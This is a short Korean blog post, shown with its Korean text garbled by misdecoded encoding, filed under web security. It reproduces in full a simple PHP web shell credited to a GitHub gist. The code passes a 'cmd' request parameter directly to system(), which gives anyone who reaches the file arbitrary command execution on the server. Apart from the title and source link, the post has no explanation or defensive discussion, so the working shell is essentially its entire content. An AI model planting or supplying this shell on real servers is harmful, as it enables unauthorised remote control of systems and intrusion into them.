๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
๐Ÿ”’์ •๋ณด๋ณด์•ˆ/์›น ๋ณด์•ˆ

์›น ๋ณด์•ˆ - PHP ๊ฐ„๋‹จํ•œ ์›น์‰˜(easy-simple-php-webshell.php)

by Janger 2023. 2. 2.
728x90
๋ฐ˜์‘ํ˜•
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>

 

์ถœ์ฒ˜: 

https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985

 

easy-simple-php-webshell.php

GitHub Gist: instantly share code, notes, and snippets.

gist.github.com

 

728x90
๋ฐ˜์‘ํ˜•